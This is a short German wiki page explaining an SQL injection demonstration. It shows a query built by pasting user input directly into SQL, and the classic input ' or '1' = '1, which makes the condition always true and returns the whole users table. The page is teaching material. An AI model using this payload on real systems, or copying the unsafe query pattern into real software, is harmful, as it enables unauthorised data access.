Sql-Injection-Proof-of-Concept

Aus xinux.net

Version vom 10. Oktober 2020, 11:22 Uhr von Thomas.will (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Test Seite

SQL Injection Vorbereitung

https://sql.willux.de/

Unsichere Seite

Sichere Seite

Erläuterung

Bei der Unsicheren Methode wird folgender Query abgesetzt.

SELECT * FROM users WHERE username='$search';

Wenn wir in die Variable $search folgendes schreiben

$search = ' or '1' = '1

wird folgender Suchausdruck gebildet

SELECT * FROM users WHERE username=' ' or '1' = '1';

da der 2. Ausdruck wahr ist, wid die ganze Tabelle ausgegeben.

Abgerufen von „https://xinux.net/index.php?title=Sql-Injection-Proof-of-Concept&oldid=21699“